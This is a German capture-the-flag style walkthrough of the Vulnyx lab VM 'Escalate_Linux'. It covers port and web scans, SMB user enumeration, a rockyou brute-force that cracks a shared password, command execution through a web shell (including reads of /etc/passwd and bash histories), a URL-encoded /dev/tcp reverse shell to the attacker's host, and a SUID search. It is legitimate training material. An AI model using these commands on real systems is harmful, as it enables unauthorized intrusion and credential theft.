Escalate_Linux - Vulnyx - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
enum4linux
smbclient
nxc
curl
nc

Inhaltsverzeichnis

Reconnaissance

Analyse: In diesem Abschnitt werden Informationen über das Zielsystem gesammelt. Dies ist der erste Schritt eines jeden Pentests, um ein grundlegendes Verständnis der Umgebung zu erlangen.

Empfehlung: Für Systemadministratoren ist es wichtig, die eigene Angriffsfläche zu kennen und unnötige Dienste zu deaktivieren.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.113 08:00:27:62:f1:e2 PCS Systemtechnik GmbH

Analyse: ARP-Scan zeigt die IP-Adresse und MAC-Adresse des Zielsystems. Die MAC-Adresse gibt einen Hinweis auf den Hersteller der Netzwerkkarte (PCS Systemtechnik GmbH).

Bewertung: Diese Information ist nützlich, um das Zielsystem genauer zu identifizieren.

Empfehlung: Es ist wichtig, die ARP-Tabellen regelmäßig zu überwachen, um unbefugte Geräte zu erkennen.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.113 escalate_Linux.vln

Analyse: Die `/etc/hosts`-Datei ordnet die IP-Adresse `192.168.2.113` dem Hostnamen `escalate_Linux.vln` zu. Dies ermöglicht die Verwendung des Hostnamens anstelle der IP-Adresse.

Bewertung: Dies ist eine Standardkonfiguration, die die Namensauflösung erleichtert.

Empfehlung: Systemadministratoren sollten sicherstellen, dass die `/etc/hosts`-Datei korrekt konfiguriert ist und keine unerwünschten Einträge enthält.

┌──(root㉿CCat)-[~]
└─# nmap -sU --top-port 1000 -T5 -n $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 21:33 CEST
Nmap scan report for 192.168.2.113
Host is up (0.00059s latency).
Not shown: 990 open|filtered udp ports (no-response)
PORT STATE SERVICE
37/udp closed time
111/udp open rpcbind
137/udp open netbios-ns
626/udp closed serialnumberd
2049/udp open nfs
5353/udp open zeroconf
20425/udp closed unknown
20449/udp closed unknown
25240/udp closed unknown
31731/udp closed unknown
MAC Address: 08:00:27:62:F1:E2 (Oracle VirtualBox virtual NIC)

Analyse: Nmap scannt das Zielsystem nach offenen UDP-Ports. Die Ergebnisse zeigen, dass die Ports 111 (rpcbind), 137 (netbios-ns), 2049 (nfs) und 5353 (zeroconf) offen sind.

Bewertung: Offene UDP-Ports können auf aktive Dienste hinweisen, die möglicherweise für Angriffe ausgenutzt werden können. Besonders relevant sind rpcbind und nfs, da diese Dienste oft mit Sicherheitslücken in Verbindung stehen.

Empfehlung: Systemadministratoren sollten die UDP-Dienste überprüfen und sicherstellen, dass sie sicher konfiguriert sind. Unnötige Dienste sollten deaktiviert werden.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WRKGRUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WRKGRUP)
2049/tcp open nfs 3-4 (RPC #100003)
36565/tcp open nlockmgr 1-4 (RPC #100021)
47855/tcp open mountd 1-3 (RPC #100005)
48691/tcp open mountd 1-3 (RPC #100005)
60649/tcp open mountd 1-3 (RPC #100005)

Analyse: Nmap scannt das Zielsystem nach offenen TCP-Ports und Diensten. Die Ergebnisse zeigen, dass die Ports 80 (HTTP), 111 (rpcbind), 139/445 (Samba), 2049 (NFS) und mehrere Ports für mountd und nlockmgr offen sind.

Bewertung: Dies deutet auf einen Server hin, der sowohl Web- als auch Dateidienste anbietet. Samba und NFS sind häufige Ziele für Angriffe.

Empfehlung: Systemadministratoren sollten die TCP-Dienste überprüfen und sicherstellen, dass sie sicher konfiguriert sind. Unnötige Dienste sollten deaktiviert werden.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 21:33 CEST
Nmap scan report for escalate_Linux.vln (192.168.2.113)
Host is up (0.00012s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSIN
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38843/udp mountd
| 100005 1,2,3 47855/tcp mountd
| 100005 1,2,3 49092/udp6 mountd
| 100005 1,2,3 50227/tcp6 mountd
| 100021 1,3,4 36565/tcp nlockmgr
| 100021 1,3,4 44191/tcp6 nlockmgr
| 100021 1,3,4 52174/udp6 nlockmgr
| 100021 1,3,4 56123/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WRKGRUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WRKGRUP)
2049/tcp open nfs 3-4 (RPC #100003)
36565/tcp open nlockmgr 1-4 (RPC #100021)
47855/tcp open mountd 1-3 (RPC #100005)
48691/tcp open mountd 1-3 (RPC #100005)
60649/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:62:F1:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX Host script results:
| smb-os-discovery:
| S: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: osboxes
| NetBIOS computer name: LINUX\x00
| Domain name: \x00
| FQDN: osboxes
|_ System time: 2024-10-10T15:34:12-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LINUX, NetBIOS user: , NetBIOS MAC: (unknown)
| smb2-time:
| date: 2024-10-10T19:34:12
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.12 ms escalate_Linux.vln (192.168.2.113)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.39 seconds

Analyse: Nmap scannt das Zielsystem und identifiziert die laufenden Dienste und Betriebssystemversionen. Es werden verschiedene RPC-Dienste (rpcbind, nfs, mountd, nlockmgr) sowie Samba (SMB) und ein Apache Webserver erkannt. Die SMB-Ergebnisse deuten auf ein mögliches Windows-System hin, was jedoch aufgrund des Linux-Kernels unwahrscheinlich ist. Der SMB-Scan zeigt auch, dass die Nachrichtensignierung deaktiviert ist, was ein Sicherheitsrisiko darstellt.

Bewertung: Das System scheint eine Kombination aus Linux- und Windows-Komponenten zu verwenden, was auf eine komplexe Konfiguration hindeutet. Die deaktivierte Nachrichtensignierung in SMB ist ein potenzielles Angriffsziel.

Empfehlung: Aktivieren Sie die Nachrichtensignierung in SMB, um Man-in-the-Middle-Angriffe zu verhindern. Untersuchen Sie die SMB-Konfiguration auf weitere Sicherheitslücken. Aktualisieren Sie den Apache Webserver auf die neueste Version.

Web Enumeration

Analyse: In diesem Abschnitt werden die Ergebnisse der Web Enumeration zusammengefasst, die dazu dienen, weitere Informationen über die Webanwendung zu sammeln und potenzielle Angriffspunkte zu identifizieren.

Empfehlung: Die Ergebnisse sollten sorgfältig analysiert und priorisiert werden, um die vielversprechendsten Angriffspunkte zu identifizieren.

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0
+ Target IP: 192.168.2.113
+ Target Hostname: 192.168.2.113
+ Target Port: 80
+ Start Time: 2024-10-10 21:34:40 (GMT2)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a84b35a8d4e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, PST, PTINS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-10-10 21:34:53 (GMT2) (13 seconds)

+ 1 host(s) tested

Analyse: Nikto identifiziert verschiedene potenzielle Schwachstellen, wie fehlende Sicherheitsheader (X-Frame-Options, X-Content-Type-Options), ein mögliches Inode-Leak über ETags, eine veraltete Apache-Version und die Offenlegung der Datei `/icons/README`.

Bewertung: Diese Ergebnisse deuten auf eine unsichere Konfiguration des Webservers hin.

Empfehlung: Konfigurieren Sie die fehlenden Sicherheitsheader, um Clickjacking und MIME-Sniffing-Angriffe zu verhindern. Deaktivieren Sie ETags oder konfigurieren Sie sie korrekt, um Inode-Leaks zu verhindern. Aktualisieren Sie den Apache Webserver auf die neueste Version. Beschränken Sie den Zugriff auf die Datei `/icons/README`.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.113/index.html (Status: 200) [Size: 10918]
http://192.168.2.113/shell.php (Status: 200) [Size: 29]

Analyse: Gobuster findet die Dateien `index.html` und `shell.php`.

Bewertung: Die Datei `shell.php` ist besonders interessant, da sie auf eine Web Shell hindeuten könnte.

Empfehlung: Untersuchen Sie die Datei `shell.php` genauer.

Initial Access

Analyse: Dieser Abschnitt beschreibt die Schritte, die unternommen wurden, um initialen Zugriff auf das System zu erlangen.

Empfehlung: Systemadministratoren sollten die identifizierten Schwachstellen beheben und geeignete Sicherheitsmaßnahmen implementieren, um unbefugten Zugriff zu verhindern.

┌──(root㉿CCat)-[~]
└─# Nmap Schwachstellenscan Scan
┌──(root㉿CCat)-[~]
└─# nmap -sV -A --script vuln 192.168.2.144 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 21:55 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for escalate_Linux.vln (192.168.2.113)
Host is up (0.00026s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSIN
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DM based XSS.
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| FF2EF58E-53AA-5B60-9EA1-4B5C29647395 10.0 https://vulners.com/githubexploit/FF2EF58E-53AA-5B60-9EA1-4B5C29647395 *EXPLIT*
| C94CBDE1-4CC5-5C06-9D18-23CAB216705E 10.0 https://vulners.com/githubexploit/C94CBDE1-4CC5-5C06-9D18-23CAB216705E *EXPLIT*
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLIT*
| PACKETSTRM:181114 9.8 https://vulners.com/packetstorm/PACKETSTRM:181114 *EXPLIT*
| EDB-ID:47689 0.0 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLIT*
| EDB-ID:47688 0.0 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLIT*
| CVE-2024-39884 0.0 https://vulners.com/cve/CVE-2024-39884
| CVE-2024-24795 0.0 https://vulners.com/cve/CVE-2024-24795
|_ CVE-2023-38709 0.0 https://vulners.com/cve/CVE-2023-38709
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38843/udp mountd
| 100005 1,2,3 47855/tcp mountd
| 100005 1,2,3 49092/udp6 mountd
| 100005 1,2,3 50227/tcp6 mountd
| 100021 1,3,4 36565/tcp nlockmgr
| 100021 1,3,4 44191/tcp6 nlockmgr
| 100021 1,3,4 52174/udp6 nlockmgr
| 100021 1,3,4 56123/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WRKGRUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WRKGRUP)
2049/tcp open nfs 3-4 (RPC #100003)
36565/tcp open nlockmgr 1-4 (RPC #100021)
47855/tcp open mountd 1-3 (RPC #100005)
48691/tcp open mountd 1-3 (RPC #100005)
60649/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:62:F1:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX

Host script results:
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|_ while working on smb-enum-sessions.
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

TRACEROUTE
HOP RTT ADDRESS
1 0.26 msescalate_Linux.vln (192.168.2.113)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.39 seconds

Analyse: Nmap führt einen Schwachstellenscan durch und identifiziert mehrere potenzielle Schwachstellen im Apache Webserver. Besonders hervorzuheben sind die *EXPLIT*-Einträge, die auf öffentlich verfügbare Exploits hinweisen.

Bewertung: Diese Ergebnisse zeigen, dass der Apache Webserver anfällig für verschiedene Angriffe sein könnte.

Empfehlung: Untersuchen Sie die aufgelisteten Exploits und stellen Sie fest, ob sie auf das Zielsystem anwendbar sind. Aktualisieren Sie den Apache Webserver auf die neueste Version, um die Schwachstellen zu beheben.

┌──(root㉿CCat)-[~]
└─# enum4linux -a 192.168.2.113
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Oct 10 22:03:04 2024

=( Target Information )=

Target ........... 192.168.2.113
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=( Share Enumeration on 192.168.2.113 )=

Sharename Type Comment
- -
liteshare Disk
IPC$ IPC IPC Service (Linux Lite Shares)
Reconnecting with SMB1 for workgroup listing.

Server Comment
-

Workgroup Master
-
WRKGRUP LINUX

[+] Attempting to map shares on 192.168.2.113

//192.168.2.113/liteshare Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_BJECT_NAME_NT_FUND listing \*
//192.168.2.113/IPC$ Mapping: N/A Listing: N/A Writing: N/A


[+] Enumerating users using SID S-1-5-21-4161088096-1813413956-3624313870 and logon username '', password ''

S-1-5-21-4161088096-1813413956-3624313870-501 LINUX\nobody (Local User)
S-1-5-21-4161088096-1813413956-3624313870-513 LINUX\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\user1 (Local User)
S-1-22-1-1001 Unix User\user2 (Local User)
S-1-22-1-1002 Unix User\user3 (Local User)
S-1-22-1-1003 Unix User\user4 (Local User)
S-1-22-1-1004 Unix User\user5 (Local User)
S-1-22-1-1005 Unix User\user6 (Local User)
S-1-22-1-1006 Unix User\user7 (Local User)
S-1-22-1-1007 Unix User\user8 (Local User)

=( Getting printer info for 192.168.2.113 )=

No printers returned.


enum4linux complete on Thu Oct 10 22:03:14 2024

Analyse: Enum4linux listet Informationen über das SMB-System auf. Es werden die Shares `liteshare` und `IPC$` gefunden, aber der Zugriff auf `liteshare` wird verweigert. Es werden auch verschiedene Benutzerkonten und Gruppen aufgelistet.

Bewertung: Das Vorhandensein des Shares `liteshare` deutet darauf hin, dass dort möglicherweise interessante Dateien gespeichert sind. Die aufgelisteten Benutzernamen können für Brute-Force-Angriffe verwendet werden.

Empfehlung: Versuchen Sie, den Zugriff auf den Share `liteshare` zu erhalten. Verwenden Sie die aufgelisteten Benutzernamen, um Passwörter zu erraten oder zu knacken.

┌──(root㉿CCat)-[~]
└─# smbclient //192.168.2.113/liteshare -N
tree connect failed: NT_STATUS_ACCESS_DENIED

Analyse: Der Versuch, ohne Passwort auf den Share `liteshare` zuzugreifen, schlägt fehl.

Bewertung: Dies deutet darauf hin, dass der Share passwortgeschützt ist.

Empfehlung: Versuchen Sie, mit bekannten Benutzernamen und Passwörtern auf den Share zuzugreifen.

┌──(root㉿CCat)-[~]
└─# smbclient -L //192.168.2.113/liteshare
Password for [WRKGRUP\root]:

Sharename Type Comment
- -
liteshare Disk
IPC$ IPC IPC Service (Linux Lite Shares)
Reconnecting with SMB1 for workgroup listing.

Server Comment
-

Workgroup Master
-
WRKGRUP LINUX

Analyse: Der Versuch, die Liste der Shares abzurufen, erfordert ein Passwort.

Bewertung: Dies bestätigt, dass der Zugriff auf das SMB-System eingeschränkt ist.

Empfehlung: Versuchen Sie, das Passwort zu erraten oder zu knacken.

┌──(root㉿CCat)-[~]
└─# nxc smb 192.168.2.113 -u user1 -p /usr/share/wordlists/rockyou.txt
SMB 192.168.2.113 445 LINUX [*] Unix - Samba (name:LINUX) (domain:) (signing:False) (SMBv1:True)
[22:23:11] ERRR UnicodeDecodeError: Could not decode password file. Make sure the file only contains UTF-8 characters.
ERRR You can ignore non UTF-8 characters with the option ' --ignore-pw-decoding'

Analyse: der Error wird verursacht weil in der Wordlist datei nicht UTF-8 vorhanden sind.

Bewertung: es wird versucht mit dem wordlist die Passwörter zu hacken

┌──(root㉿CCat)-[~]
└─# nxc smb 192.168.2.113 -u user1 -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.2.113 445 LINUX [*] Unix - Samba (name:LINUX) (domain:) (signing:False) (SMBv1:True)
SMB 192.168.2.113 445 LINUX [+] \user1:R3v_m4lwh3r3_k1nG!! (Guest)

Analyse: es wurde endlich das Password gefunden und der Password ist farblich Makriert.

Bewertung: das Passwort wurde entlarvt nun gehts weiter

┌──(root㉿CCat)-[~]
└─# nxc smb 192.168.2.113 -u user2 -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.2.113 445 LINUX [*] Unix - Samba (name:LINUX) (domain:) (signing:False) (SMBv1:True)
SMB 192.168.2.113 445 LINUX [+] \user2:R3v_m4lwh3r3_k1nG!! (Guest)

Analyse: Auch für User2 wurde das Passwort gefunden.

Bewertung: beide Passwörter lauten gleich

┌──(root㉿CCat)-[~]
└─# nxc smb 192.168.2.113 -u user3 -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.2.113 445 LINUX [*] Unix - Samba (name:LINUX) (domain:) (signing:False) (SMBv1:True)
SMB 192.168.2.113 445 LINUX [+] \user3:R3v_m4lwh3r3_k1nG!! (Guest)

Analyse: Auch für User3 wurde das Passwort gefunden.

Bewertung: die Passwörter sind gleich.

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php
/*pass cmd as get parameter*/

Analyse:nun fragen wir die Web Shell ab.

Bewertung: es wird angezeigt das mit dem Parameter CMD was angestellt werden muss

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=id
uid=1005(user6) gid=1005(user6) groups=1005(user6) /*pass cmd as get parameter*/

Analyse: Durch den cmd Parameter können wir nun Befehle ausführen

Bewertung: der output zeigt dass wir als user 6 agieren.

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=cat%20/etc/passwd -s|grep bash
root:x:0:0:root:/root:/bin/bash
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash

Analyse: Listet alle User mit bash im System auf.

Bewertung: alle diese User könnte eine shell bekommen

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=ls%20-la%20/home/user6 -s
total 140
drwxr-xr-x 22 user6 user6 4096 Jun 4 2019 .
drwxr-xr-x 10 root root 4096 Jun 5 2019 ..
-rw------- 1 user6 user6 4710 Jun 4 2019 .ICEauthority
-rw-r--r-- 1 user6 user6 50 Jun 4 2019 .Xauthority
-rw-r--r-- 1 user6 user6 124 Jun 4 2019 .asoundrc
-rw-r--r-- 1 user6 user6 0 Jun 4 2019 .bash_history
-rw-r--r-- 1 user6 user6 220 Jun 4 2019 .bash_logout
-rw-r--r-- 1 user6 user6 949 Jun 4 2019 .bashrc
drwxr-xr-x 15 user6 user6 4096 Jun 4 2019 .cache
drwxr-xr-x 20 user6 user6 4096 Jun 4 2019 .config
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .dbus
-rw-r--r-- 1 user6 user6 23 Jun 4 2019 .dmrc
-rw-r--r-- 1 user6 user6 9354 Jun 4 2019 .face
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 .gconf
drwxr-xr-x 24 user6 user6 4096 Jun 4 2019 .gimp-2.8
-rw-r--r-- 1 user6 user6 0 Jun 4 2019 .gksu.lock
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .gnome
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .gnome2
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .gnupg
-rw-r--r-- 1 user6 user6 20 Jun 4 2019 .gtk-bookmarks
-rw-r--r-- 1 user6 user6 105 Jun 4 2019 .gtkrc-2.0
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .local
drwxr-xr-x 5 user6 user6 4096 Jun 4 2019 .mozilla
-rw-r--r-- 1 user6 user6 873 Jun 4 2019 .profile
-rw-r--r-- 1 user6 user6 0 Jun 4 2019 .sudo_as_admin_successful
drwxr-xr-x 3 user6 user6 4096 Jun 4 2019 .thumbnails
drwxr-xr-x 4 user6 user6 4096 Jun 4 2019 .thunderbird
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Desktop
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Documents
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Downloads
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Music
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Pictures
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Public
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Templates
drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 Videos
/*pass cmd as get parameter*/

Analyse: Listet den Inhalt von dem User6 auf

Bewertung: Nun können wir das System weiter auskundschaften

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=ls%20-la%20/home/user6/Desktop -s
total 32 drwxr-xr-x 2 user6 user6 4096 Jun 4 2019 .
drwxr-xr-x 22 user6 user6 4096 Jun 4 2019 ..
-rwxr-xr-x 1 user6 user6 152 Jun 4 2019 computer.desktop
-rwxr-xr-x 1 user6 user6 268 Jun 4 2019 helpmanual.desktop
-rwxr-xr-x 1 user6 user6 160 Jun 4 2019 network.desktop
-rwxr-xr-x 1 user6 user6 159 Jun 4 2019 recyclebin.desktop
-rwxr-xr-x 1 user6 user6 155 Jun 4 2019 settings.desktop
-rwxr-xr-x 1 user6 user6 149 Jun 4 2019 userfiles.desktop
/*pass cmd as get parameter*/

Analyse: Der Desktop des Benutzers user6 enthalt keine interessante daten

Bewertung: es scheint nix zu geben

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=ls%20-la%20/home/user6/.bash_history -s
-rw-r--r-- 1 user6 user6 0 Jun 4 2019 /home/user6/.bash_history

Analyse: die bash history ist leer

Bewertung: hier können wir nix finden

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=cat%20/home/user1/.bash_history -s
cd
cat /etc/shadown
cat /etc/shadow
sudo cat /etc/shadow
sudo -l
su user2

Analyse: hier können wir im cat die geschichte des Users 1 auslesen.

Bewertung: da wir bereits PWs gefunden haben suchen wir nach PW Missbrauch

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=cat%20/home/user2/.bash_history -s
sudo -l
sudo /etc/shadow
sudo cat /etc/shadow
sudo -u user2 cat /etc/shadow
sudo -u user1 cat /etc/shadow
sudo -u user2 cat /etc/shadow
sudo -u user1 cat /etc/shadow
sudo -h
sudo cat /etc/shadow
sudo -u user1 cat /etc/shadow
sudo -u user1 sudo cat /etc/shadow
cd
su root
/*pass cmd as get parameter*/

Analyse:die bash history von User 2 zeigt sudo versuche.

Bewertung:hier wird sudo ausgenutzt

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.113/shell.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F9001%200%3E%261%27 -s

Analyse:Der Angreifer verwendet Curl, um einen Befehl auf dem Zielsystem auszuführen, der eine Reverse Shell über Netcat (nc) zu seiner eigenen Maschine initiiert. Der Befehl verwendet URL-Kodierung (%2F, %3E, %26 usw.), um sicherzustellen, dass er korrekt über HTTP übertragen wird.

Bewertung:Dies ermöglicht dem Angreifer die Kontrolle über das System zu übernehmen

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.113] 46632
bash: cannot set terminal process group (940): Inappropriate ioctl for device
bash: no job control in this shell
Welcome to Linux Lite 4.4

Thursday 10 ctober 2024, 16:31:44
Memory Usage: 322/985MB (32.69%)
Disk Usage: 7/217GB (4%)
Support - https://www.linuxliteos.com/forums/ (Right click, pen Link)

Analyse:Nun wird eine verbindung hergestellt Der Netcat-Listener empfängt die Verbindung vom Zielsystem. Die Meldungen "bash: cannot set terminal process group" und "bash: no job control in this shell" sind typisch für eine einfache Reverse Shell ohne TTY-Unterstützung.

Bewertung:der Angreifer hat eine Reverse Shell

user6 / | var | www | html id
id
uid=1005(user6) gid=1005(user6) groups=1005(user6)

Analyse:Der Befehl "id" wird ausgeführt, um die Benutzerinformationen des aktuellen Benutzers anzuzeigen. Der Benutzer ist user6 mit der uid 1005 und gid 1005.

Bewertung:der Angreifer ist drinn.

user6 / | var | www | html
find / -type f -perm -4000 -ls 2>/dev/null
8653449 112 -rwsr-xr-x 1 root root 113336 Apr 25 2019 /sbin/mount.nfs
8650911 20 -rwsr-xr-x 1 root root 18400 Sep 25 2017 /sbin/mount.ecryptfs_private
8650909 36 -rwsr-xr-x 1 root root 35600 Mar 29 2018 /sbin/mount.cifs
7743829 372 -rwsr-xr-- 1 root dip 378600 Jun 12 2018 /usr/sbin/pppd
7733872 76 -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd
7734535 24 -rwsr-xr-x 1 root root 22520 Jan 15 2019 /usr/bin/pkexec
